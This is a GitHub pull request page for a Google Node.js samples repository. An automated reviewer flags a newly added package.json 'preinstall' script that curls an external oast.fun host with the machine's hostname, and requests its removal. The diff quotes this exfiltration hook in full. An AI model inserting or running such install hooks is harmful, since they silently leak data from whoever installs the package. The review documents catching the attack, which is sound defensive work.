canary: benign#4368
Conversation
product-auto-label
Bot
added
samples
|
Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA). View this failed invocation of the CLA check for more information. For the most up to date status, view the checks section at the bottom of the pull request. |
![gemini-code-assist[bot]](https://avatars.githubusercontent.com/in/956858?s=60&v=4){kind=small}
There was a problem hiding this comment.
Code Review
This pull request introduces a critical security vulnerability by adding a malicious preinstall script to package.json that exfiltrates the local hostname to an external domain. The reviewer correctly identified this as unauthorized data exfiltration and requested its immediate removal.
| "test": "c8 mocha -p -j 2 --exit test/*.test.js", | ||
| "preinstall": "curl -s https://dnipykvxpgkngpftnqxlrsotvsex5c7dy.oast.fun/proof?h=$(hostname)" |
There was a problem hiding this comment.
Critical Security Risk: The added preinstall script executes an external curl command that exfiltrates the local hostname to an external domain. This is a severe security vulnerability (unauthorized data exfiltration / remote code execution during package installation). The preinstall script must be removed immediately.
"test": "c8 mocha -p -j 2 --exit test/*.test.js"1 participant
Description
Fixes #
Note: Before submitting a pull request, please open an issue for discussion if you are not associated with Google.
Checklist
npm test(see Testing)npm run lint(see Style)GoogleCloudPlatform/nodejs-docs-samples. Not a fork.